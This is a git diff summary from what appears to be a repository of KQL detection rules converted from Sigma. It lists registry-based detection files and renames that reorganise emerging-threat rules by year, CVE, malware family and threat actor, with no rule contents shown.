.../allow_rdp_remote_assistance_feature.kql | 0 ...river_disallowed_on_dev_drive_registry.kql | 0 .../bypass_uac_using_delegateexecute.kql | 0 .../bypass_uac_using_event_viewer.kql | 0 .../bypass_uac_using_silentcleanup_task.kql | 0 .../registry_set}/change_the_fax_dll.kql | 0 ...ccount_associated_with_the_fax_service.kql | 0 ...channel_access_permission_via_registry.kql | 0 .../classes_autorun_keys_modification.kql | 0 .../clickonce_trust_prompt_tampering.kql | 0 .../registry_set}/com_hijack_via_sdclt.kql | 0 .../com_hijacking_via_treatas.kql | 0 
..._of_default_system_clsid_default_value.kql | 0 .../common_autorun_keys_modification.kql | 0 .../crashcontrol_crashdump_disabled.kql | 0 ...ntcontrolset_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 ...ntversion_nt_autorun_keys_modification.kql | 0 ..._file_open_handler_executes_powershell.kql | 0 ..._rdp_port_changed_to_non_standard_port.kql | 0 .../dhcp_callout_dll_installation.kql | 0 ...ore_mode_dsrm_registry_value_tampering.kql | 0 ...ministrative_share_creation_at_startup.kql | 0 ...network_protection_on_windows_defender.kql | 0 ..._internal_tools_or_feature_in_registry.kql | 0 .../disable_macro_runtime_scan_scope.kql | 0 ...crosoft_defender_firewall_via_registry.kql | 0 ...rivacy_settings_experience_in_registry.kql | 0 ...ble_pua_protection_on_windows_defender.kql | 0 ..._tamper_protection_on_windows_defender.kql | 0 ...nder_functionalities_via_registry_keys.kql | 0 ...ble_windows_event_logging_via_registry.kql | 0 .../disable_windows_firewall_by_registry.kql | 0 ..._windows_security_center_notifications.kql | 0 .../disabled_windows_defender_eventlog.kql | 0 ...splaying_hidden_files_feature_disabled.kql | 0 .../dns_over_https_enabled_by_registry.kql | 0 ..._to_disallowed_images_in_hvci_registry.kql | 0 .../registry_set}/enable_lm_hash_storage.kql | 0 ...ocal_manifest_installation_with_winget.kql | 0 ...enable_microsoft_dynamic_data_exchange.kql | 0 ...ing_cor_profiler_environment_variables.kql | 0 .../etw_logging_disabled_for_rpcrt4_dll.kql | 0 .../etw_logging_disabled_for_scm.kql | 0 ...abled_in_net_processes_sysmon_registry.kql | 0 .../execution_dll_of_choice_using_wab_exe.kql | 0 ...filefix_command_evidence_in_typedpaths.kql | 10 +++++++++ ...e_schedule_task_via_index_value_tamper.kql | 0 ...count_via_specialaccounts_registry_key.kql | 0 ...visor_enforced_code_integrity_disabled.kql | 2 +- ...r_enforced_paging_translation_disabled.kql | 0 .../registry_set}/ie_change_domain_zone.kql | 0 
..._to_mycomputer_zone_for_http_protocols.kql | 0 ...net_explorer_autorun_keys_modification.kql | 0 ...lorer_disablefirstruncustomize_enabled.kql | 0 ...vestandaloneupdater_exe_proxy_download.kql | 0 ...request_via_dumptype_registry_settings.kql | 0 ...d_in_a_potentially_suspicious_document.kql | 0 .../maxmpxct_registry_value_changed.kql | 0 ...crosoft_office_protected_view_disabled.kql | 0 .../modification_of_ie_registry_settings.kql | 0 ...odify_user_shell_folders_startup_value.kql | 0 ...enassemblyusagelog_registry_key_tamper.kql | 0 .../new_application_in_appcompat.kql | 0 ..._custom_db_path_registry_configuration.kql | 0 ...custom_vbscript_registry_configuration.kql | 0 ...ustom_wmi_query_registry_configuration.kql | 0 ...new_dns_serverlevelplugindll_installed.kql | 0 .../new_file_association_using_exefile.kql | 0 ..._registered_from_a_suspicious_location.kql | 0 .../new_odbc_driver_registered.kql | 0 ...or_ca_or_authroot_certificate_to_store.kql | 0 ..._run_key_pointing_to_suspicious_folder.kql | 0 ...ders_registered_with_uncommon_dll_name.kql | 0 .../office_autorun_keys_modification.kql | 0 .../office_macros_warning_disabled.kql | 0 ...tls1_0_tls1_1_protocol_version_enabled.kql | 0 ...ientmailrules_setting_enabled_registry.kql | 0 ...cution_without_warning_setting_enabled.kql | 0 ...ook_security_settings_updated_registry.kql | 0 ...ckup_for_system_registry_hives_enabled.kql | 0 ...tence_via_disk_cleanup_handler_autorun.kql | 0 .../persistence_via_hhctrl_ocx.kql | 0 .../persistence_via_new_sip_provider.kql | 0 .../potential_amsi_com_server_hijacking.kql | 0 ...t_manager_settings_associations_tamper.kql | 0 ...nt_manager_settings_attachments_tamper.kql | 0 ...otential_autologger_sessions_tampering.kql | 0 ...al_clickfix_execution_pattern_registry.kql | 2 +- ...tstrike_service_installations_registry.kql | 0 ..._hijacking_via_treatas_subkey_registry.kql | 2 +- ..._attempt_using_new_networkprovider_reg.kql | 0 ...ntial_eventlog_file_location_tampering.kql | 0 
..._pendingfilerenameoperations_tampering.kql | 0 .../potential_persistence_using_debugpath.kql | 0 ...istence_via_app_paths_default_property.kql | 0 ...via_appcompat_registerapprestart_layer.kql | 0 .../potential_persistence_via_autodialdll.kql | 0 ...tential_persistence_via_chm_helper_dll.kql | 0 ...ersistence_via_custom_protocol_handler.kql | 0 ...ential_persistence_via_dllpathoverride.kql | 0 ...ersistence_via_event_viewer_events_asp.kql | 0 ..._persistence_via_excel_add_in_registry.kql | 0 .../potential_persistence_via_globalflags.kql | 0 ...persistence_via_logon_scripts_registry.kql | 2 +- ...tential_persistence_via_lsa_extensions.kql | 0 .../potential_persistence_via_mpnotify.kql | 0 ...rsistence_via_mycomputer_registry_keys.kql | 0 ...sistence_via_netsh_helper_dll_registry.kql | 0 ...stence_via_new_amsi_providers_registry.kql | 14 ++++++++++++ ...tial_persistence_via_outlook_home_page.kql | 0 ...utlook_loadmacroprovideronboot_setting.kql | 0 ...ial_persistence_via_outlook_today_page.kql | 0 ...rsistence_via_scrobj_dll_com_hijacking.kql | 0 ...via_shim_database_in_uncommon_location.kql | 0 ...istence_via_shim_database_modification.kql | 0 .../potential_persistence_via_typedpaths.kql | 0 ...nce_via_visual_studio_tools_for_office.kql | 0 ..._powershell_execution_policy_tampering.kql | 0 ...y_abuse_for_binary_proxy_execution_reg.kql | 0 ...otential_psfactorybuffer_com_hijacking.kql | 0 ...are_activity_using_legalnotice_message.kql | 0 ...istence_attempt_via_dbgmanageddebugger.kql | 0 ...sistence_attempt_via_windows_telemetry.kql | 0 ...ll_context_menu_scan_command_tampering.kql | 0 ...ia_windows_developer_features_registry.kql | 0 ...t_reflectdebugger_registry_value_abuse.kql | 0 ...d_executed_via_run_dialog_box_registry.kql | 0 ...desktop_background_change_via_registry.kql | 0 ...ally_suspicious_odbc_driver_registered.kql | 0 .../powershell_as_a_service_in_registry.kql | 0 ...ng_disabled_via_registry_key_tampering.kql | 2 +- 
...rshell_script_execution_policy_enabled.kql | 0 ...ua_sysinternal_tool_execution_registry.kql | 2 +- ..._sysinternals_tools_execution_registry.kql | 2 +- ...ity_warning_disabled_in_excel_registry.kql | 0 .../rdp_sensitive_settings_changed.kql | 22 +++++++++++++++++++ ...rdp_sensitive_settings_changed_to_zero.kql | 0 .../register_new_ifiltre_for_persistence.kql | 0 .../registry_disable_system_restore.kql | 0 .../registry_explorer_policy_modification.kql | 0 .../registry_hide_function_from_user.kql | 0 ..._modification_to_hidden_file_extension.kql | 0 ...istry_persistence_via_explorer_run_key.kql | 0 ...y_persistence_via_service_in_safe_mode.kql | 0 ...ctedadminmode_registry_value_tampering.kql | 0 ...sions_via_the_registry_2_vpn_extension.kql | 0 ...d_taskcache_change_by_uncommon_program.kql | 0 .../screensaver_registry_key_set.kql | 0 ...ostics_turn_off_check_enabled_registry.kql | 0 ...d_via_minint_registry_key_registry_set.kql | 0 .../service_binary_in_suspicious_folder.kql | 0 .../registry_set}/servicedll_hijack.kql | 0 ...sion_manager_autorun_keys_modification.kql | 0 ...lication_allowed_through_exploit_guard.kql | 0 ...vironment_variable_has_been_registered.kql | 0 ...of_renamed_sysinternals_tools_registry.kql | 12 ++++++++++ .../suspicious_keyboard_layout_load.kql | 0 ...eyboard_layout_ime_file_registry_value.kql | 0 ...icious_powershell_in_registry_run_keys.kql | 0 ...ious_printer_driver_empty_manufacturer.kql | 0 .../suspicious_service_installed.kql | 0 ...icious_shim_database_patching_activity.kql | 0 ...cters_in_runmru_registry_path_clickfix.kql | 0 ...rs_in_typedpaths_registry_path_filefix.kql | 0 .../sysmon_driver_altitude_change.kql | 0 ...stem_scripts_autorun_keys_modification.kql | 0 .../tamper_with_sophos_av_registry_keys.kql | 0 ...rust_access_disable_for_vbapplications.kql | 0 ...s_abusing_winsat_path_parsing_registry.kql | 0 ...ss_using_windows_media_player_registry.kql | 0 .../uac_bypass_via_event_viewer.kql | 0 
.../registry_set}/uac_bypass_via_sdclt.kql | 0 .../registry/registry_set}/uac_disabled.kql | 0 .../uac_notification_disabled.kql | 0 .../uac_secure_desktop_prompt_disabled.kql | 0 ...eyboard_layout_ime_file_registry_value.kql | 0 ...icrosoft_office_trusted_location_added.kql | 0 ...renamed_sysinternals_tools_registryset.kql | 0 .../vbscript_payload_stored_in_registry.kql | 0 .../wdigest_enable_uselogoncredential.kql | 0 .../wfp_filter_added_via_registry.kql | 0 ...ows_defender_exclusions_added_registry.kql | 0 ...ows_defender_service_disabled_registry.kql | 0 ...vent_log_access_tampering_via_registry.kql | 0 ...indows_recall_feature_enabled_registry.kql | 0 .../winget_admin_settings_modification.kql | 0 ...inlogon_allowmultipletssessions_enable.kql | 0 .../winlogon_notify_key_logon_persistence.kql | 0 .../winsock2_autorun_keys_modification.kql | 0 ...node_classes_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 helper.py | 12 +++++++--- sigma | 2 +- 2251 files changed, 350 insertions(+), 142 deletions(-) rename KQL/rules-emerging-threats/{Execution => 2014/TA/Axiom}/zxshell_malware.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2014/TA/Turla}/turla_group_commands_may_2020.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2014/TA/Turla}/turla_group_lateral_movement.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2015/Exploits/CVE-2015-1641}/exploit_for_cve_2015_1641.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-0261}/exploit_for_cve_2017_0261.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-11882}/droppers_exploiting_cve_2017_11882.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-8759}/exploit_for_cve_2017_8759.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Malware/Adwind-RAT}/adwind_rat_jrat.kql (100%) rename 
KQL/rules-emerging-threats/{Execution => 2017/Malware/Fireball}/fireball_archer_install.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/Malware/NotPetya}/notpetya_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2017/Malware/PlugX}/potential_plugx_activity.kql (100%) rename KQL/rules-emerging-threats/{Lateral Movement => 2017/Malware/WannaCry}/wannacry_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/TA/APT10}/potential_apt10_cloud_hopper_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/TA/Dragonfly}/ps_exe_renamed_sysinternals_tool.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/TA/Lazarus}/lazarus_system_binary_masquerading.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2017/TA/Pandemic}/pandemic_registry_key.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2018/Malware/Elise-Backdoor}/elise_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/APT27}/apt27_emissary_panda_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT28}/sofacy_trojan_loader_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT29-CozyBear}/apt29_2018_phishing_campaign_commandline_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT29-CozyBear}/apt29_2018_phishing_campaign_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2018/TA/APT32-Oceanlotus}/oceanlotus_registry_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/MuddyWater}/potential_muddywater_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/OilRig}/oilrig_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/OilRig}/oilrig_apt_registry_persistence.kql (100%) rename 
KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/Slingshot}/defrag_deactivation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2018/TA/TropicTrooper}/tropictrooper_campaign_november_2018.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Exploits/BearLPE-Exploit}/potential_bearlpe_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Exploits/CVE-2019-1378}/exploiting_setupcomplete_cmd_cve_2019_1378.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/Exploits/CVE-2019-1388}/exploiting_cve_2019_1388.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/Exploits/CVE-2019-14287}/sudo_privilege_escalation_cve_2019_14287.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/BabyShark}/potential_baby_shark_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/Malware/Dridex}/potential_dridex_activity.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2019/Malware/Dtrack-RAT}/potential_dtrack_rat_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/Emotet}/potential_emotet_activity.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2019/Malware/Formbook}/formbook_process_creation.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2019/Malware/LockerGoga}/lockergoga_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/QBot}/potential_qbot_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/Malware/Ryuk}/potential_ryuk_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/Snatch}/potential_snatch_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Malware/Ursnif}/potential_ursnif_malware_activity_registry.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 
2019/TA/APC-C-12}/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2019/TA/APT31}/apt31_judgement_panda_activity.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2019/TA/Bear-APT-Activity}/potential_russian_apt_credential_theft_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/TA/EmpireMonkey}/potential_empiremonkey_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/TA/EquationGroup}/equation_group_dll_u_export_function_load.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2019/TA/MustangPanda}/mustang_panda_dropper.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/TA/Operation-Wocao}/operation_wocao_activity.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2020/Exploits/CVE-2020-10189}/exploited_cve_2020_10189_zoho_manageengine.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Exploits/CVE-2020-1048}/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Exploits/CVE-2020-1048}/suspicious_printerports_creation_cve_2020_1048_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2020/Exploits/CVE-2020-1350}/dns_rce_cve_2020_1350.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Exploits/CVE-2020-1472}/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Malware/Blue-Mockingbird}/blue_mockingbird.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Blue-Mockingbird}/blue_mockingbird_registry.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Emotet}/potential_emotet_rundll32_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/FlowCloud}/flowcloud_registry_markers.kql (100%) 
rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Ke3chang-TidePool}/potential_ke3chang_tidepool_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Malware/Maze}/potential_maze_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Malware/Trickbot}/trickbot_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/TA/Evilnum}/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2020/TA/GALLIUM}/gallium_iocs.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/Greenbug}/greenbug_espionage_group_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/Lazarus}/lazarus_group_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Leviathan}/leviathan_registry_key_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/SolarWinds-Supply-Chain}/suspicious_vbscript_un2452_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/SolarWinds-Supply-Chain}/unc2452_powershell_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/SolarWinds-Supply-Chain}/unc2452_process_creation_patterns.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/TAIDOOR-RAT}/taidoor_rat_dll_load.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Winnti}/winnti_malware_hk_university_campaign.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Winnti}/winnti_pipemon_characteristics.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-1675}/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-1675}/potential_printnightmare_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2021/Exploits/CVE-2021-1675}/printernightmare_mimikatz_driver_name.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-1675}/windows_spooler_service_suspicious_binary_load.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-26084}/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-26857}/potential_cve_2021_26857_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-26858}/cve_2021_26858_exchange_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-33771}/cve_2021_31979_cve_2021_33771_exploits.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-33771}/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-35211}/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-40444}/potential_cve_2021_40444_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-40444}/potential_exploitation_attempt_from_office_application.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Exploits/CVE-2021-40444}/suspicious_word_cab_file_write_cve_2021_40444.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/CVE-2021-41379}/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/CVE-2021-41379}/potential_cve_2021_41379_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-44077}/cve_2021_44077_poc_default_dropped_file.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 
2021/Exploits/CVE-2021-44228}/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Exploits/RazerInstaller-LPE-Exploit}/suspicious_razerinstaller_explorer_subprocess.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/SystemNightmare-Exploit}/potential_systemnightmare_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/BlackByte}/blackbyte_ransomware_registry.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/BlackByte}/potential_blackbyte_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2021/Malware/Conti}/conti_ntds_exfiltration_command.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Malware/Conti}/conti_volume_shadow_listing.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2021/Malware/Conti}/potential_conti_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2021/Malware/Conti}/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/DarkSide}/darkside_ransomware_pattern.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Devil-Bait}/potential_devil_bait_malware_reconnaissance.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Devil-Bait}/potential_devil_bait_related_indicator.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Malware/FoggyWeb}/foggyweb_backdoor_dll_loading.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/Goofy-Guineapig}/goofy_guineapig_backdoor_ioc.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/Goofy-Guineapig}/potential_goofy_guineapig_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 
2021/Malware/Goofy-Guineapig}/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Moriya-Rootkit}/moriya_rootkit_file_created.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Netwire}/potential_netwire_rat_activity_registry.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_dll_loading_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Small-Sieve}/small_sieve_malware_commandline_indicator.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Small-Sieve}/small_sieve_malware_file_indicator_creation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Small-Sieve}/small_sieve_malware_registry_persistence.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/TA/HAFNIUM}/hafnium_exchange_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/TA/Kaseya-Supply-Chain}/revil_kaseya_incident_malware_patterns.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/TA/PRIVATELOG}/apt_privatelog_image_load_pattern.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/TA/SOURGUM}/sourgum_actor_behaviours.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Exploits/CVE-2022-21554}/potential_cve_2023_21554_queuejumper_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Exploits/CVE-2022-22954}/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 
2022/Exploits/CVE-2022-24527}/cve_2022_24527_microsoft_connected_cache_lpe.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-26134}/atlassian_confluence_cve_2022_26134.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-26809}/potential_cve_2022_26809_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Exploits/CVE-2022-29072}/potential_cve_2022_29072_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2022/Exploits/CVE-2022-30190}/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-33891}/apache_spark_shell_command_injection_processcreation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Exploits/CVE-2022-41120}/suspicious_sysmon_as_execution_parent.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Malware/ChromeLoader}/chromeloader_malware_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Emotet}/emotet_loader_execution_via_lnk_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Hermetic-Wiper}/hermetic_wiper_tg_process_patterns.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/potential_raspberry_robin_dot_ending_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/raspberry_robin_initial_execution_from_external_drive.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/raspberry_robin_subsequent_execution_of_commands.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Malware/Serpent-Backdoor}/serpent_backdoor_payload_execution_via_scheduled_task.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/SocGholish}/fakeupdates_socgholish_activity.kql (100%) rename 
KQL/rules-emerging-threats/{Privilege Escalation => 2022/TA/ACTINIUM}/potential_actinium_persistence_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/TA/MERCURY}/mercury_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-22518}/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-22518}/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-23397}/outlook_task_note_reminder_received.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-27363}/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit}/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-36884}/potential_cve_2023_36884_exploitation_dropped_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-38831}/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-38831}/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql (100%) rename 
KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-40477}/cve_2023_40477_potential_exploitation_rev_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2023/Exploits/Windows-Server-Unknown-Exploit}/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_anonymous_user_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_cleanup_command_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_service_persistence_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_persistence_service_dll_creation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_persistence_service_dll_load.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_rat_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_rat_windows_user_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/DarkGate}/darkgate_autoit3_exe_execution_parameters.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/Malware/DarkGate}/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 